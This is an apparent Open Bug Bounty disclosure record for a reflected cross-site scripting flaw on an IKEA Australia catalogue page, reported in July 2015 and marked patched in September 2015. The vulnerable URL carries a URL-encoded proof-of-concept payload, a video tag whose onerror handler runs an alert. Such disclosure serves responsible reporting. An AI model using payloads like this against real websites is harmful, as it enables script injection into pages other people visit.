ikea.com XSS vulnerability

2015-07-21T11:18:00
ID OBB:74569
Type openbugbounty
Reporter tbm
Modified 2015-07-21T11:20:00

Description

Vulnerable URL:
http://www.ikea.com/au/en/catalog/categories/departments/kitchen/tools/conk/roomset/20153_cosk%22%3E%3Cvideo+src=x+onerror=alert%28%27XSSPOSED%27%29%3E%3E29a/
Details:

Description| Value
---|---
Patched:| Yes, at 07.09.2015
Latest check for patch:| 07.09.2015 14:57 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 196
Google Pagerank| 7
VIP website status:| Yes
Check ikea.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 July, 2015 11:18 GMT
Vulnerability existence verified and confirmed| 21 July, 2015 11:20 GMT